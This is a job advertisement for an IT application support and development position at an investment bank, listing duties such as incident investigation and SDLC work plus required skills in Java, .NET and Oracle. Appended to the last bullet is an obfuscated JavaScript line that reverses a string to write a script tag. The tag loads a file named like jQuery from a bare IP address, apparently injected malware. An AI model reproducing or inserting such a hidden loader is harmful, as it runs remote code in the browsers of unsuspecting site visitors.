• Provide sustaining support to the IT application systems used by the Investment bank to ensure minimum interruption to the systems which include software, database, hardware and operating system.
• Participate in all phases of the software development life cycle to deliver the IT application systems such as user requirement study, system design, system specification, coding, testing, implementation and documentation.
• Conduct investigation for any production incident including problem analysis, cause identification and recommendation for solutions implementation.
• Be a team member in the development, maintenance and support of the multiple IT application systems with exposure to various technologies and platforms.
• Ensure all source codes are optimized, written and documented in compliance to the Investment Bank and industry standard practices.
• Possess at least a Professional Certificate, Diploma, Bachelor’s Degree in Computer Science or Information Technology.
• Knowledge in Java programming, Microsoft .Net programming, Crystal Reporting and Oracle/SQL Databases.
• Team player with good interpersonal and communication skills.
• Good analytical, self-motivated and ability to work independently.
• Understanding of the software development life cycle (SDLC)
• Knowledge in preparing system integration test (SIT) plan, scripts and conditions to ensure completeness of scope of testing.
• Knowledge in technical documentation for user requirement study and IT application system flow. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))